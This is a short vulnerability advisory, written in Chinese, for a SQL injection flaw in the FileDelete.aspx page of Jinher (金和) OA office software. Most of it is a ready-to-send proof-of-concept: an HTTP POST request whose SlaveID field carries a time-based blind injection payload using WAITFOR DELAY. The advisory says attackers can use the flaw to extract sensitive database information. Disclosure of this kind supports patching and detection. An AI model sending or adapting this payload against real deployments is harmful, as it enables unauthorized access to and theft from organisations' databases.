金和OA FileDelete.aspx SQL注入漏洞

2025-09-04 金和OA PoC Public

Description

金和OA FileDelete.aspx 存在SQL注入漏洞,攻击者可构造恶意请求获取数据库敏感信息。

PoC

POST /c6/Jhsoft.Web.accept/FileDelete.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

SlaveID=1')WAITFOR/**/DELAY'0:0:5'--/Temp/

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities